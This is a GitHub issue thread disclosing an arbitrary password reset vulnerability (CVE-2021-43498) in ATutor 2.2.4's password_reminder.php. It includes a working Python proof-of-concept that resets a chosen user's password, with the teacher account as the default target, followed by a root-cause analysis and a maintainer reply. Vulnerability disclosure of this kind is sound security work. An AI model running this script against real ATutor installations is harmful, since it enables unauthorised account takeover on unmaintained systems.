ATutor icon indicating copy to clipboard operation
ATutor copied to clipboard

Published 20 hours ago verified publisher icon atutor

Arbitrary Password Reset via password_reminder.php

Open rpgmaster280 opened this issue 3 years ago • 4 comments

In version 2.2.4, it's currently possible to arbitrarily change the user password to an attacker controlled value. This is caused by a logic flaw when g, id, h, form_password_hidden, and form_change are all set. CVE has been submitted for the issue. POC is below. Please let me know if you have questions or concerns regarding this:

import hashlib, sys, requests

def force_password_change(ip, id, password):
    data = {
            "g" : 9999999999,
            "id" : id,
            "h" : 0,
            "form_password_hidden" : hashlib.sha1(password).hexdigest(),
            "form_change" : ""
    }
    url = "http://%s/ATutor/password_reminder.php" % (ip)
    print("(*) Issuing password reset to URL: %s" % url)
    requests.post(url, data)

def main():
    if len(sys.argv) < 3:
        print('(+) Utility for changing a target users password given the database row number.')
        print('(+) If no password is specified, LetMeIn will be used. Default index for teacher account is 1.')
        print('(+) usage: %s <index> <target_ip> [password]' % sys.argv[0])
        print('(+) eg: %s 1 192.168.1.2'  % sys.argv[0])
        sys.exit(-1)

    id = sys.argv[1]
    ip = sys.argv[2]
    password = "LetMeIn"
    if len(sys.argv) > 3:
        password = sys.argv[3]

    force_password_change(ip, id, password)
    print("(+) Operation complete. Manually test to see if the password changed.")

if __name__ == "__main__":
    main()

rpgmaster280 avatar Nov 05 '21 01:11 rpgmaster280

The conditional statement starting on line 97 is the root source of the issue. It's possible for both conditions (lines 97 and 99) to evaluate to false. There's a third condition that can occur that doesn't seem to be accounted for. Setting an error for this third condition should remedy the issue.

Stronger input validation for these form elements is also highly recommended.

rpgmaster280 avatar Nov 05 '21 02:11 rpgmaster280

Researching the issue further, this issue appears to have already been identified as the TOCTOU Remote Password Reset vulnerability. Metasploit module exploit/linux/http/atutor_filemanager_traversal exploits it. Not sure why, but no CVE has ever been reported for it. I'm not sure why this isn't being listed as an active issue. This seems to have been an issue since at least 2.2.1.

rpgmaster280 avatar Nov 05 '21 03:11 rpgmaster280

ATutor is no longer maintained. You are welcome to submit a pull request with a fix.

gregrgay avatar Nov 05 '21 19:11 gregrgay

Issue was designated as CVE-2021-43498 by MITRE.

rpgmaster280 avatar Apr 08 '22 22:04 rpgmaster280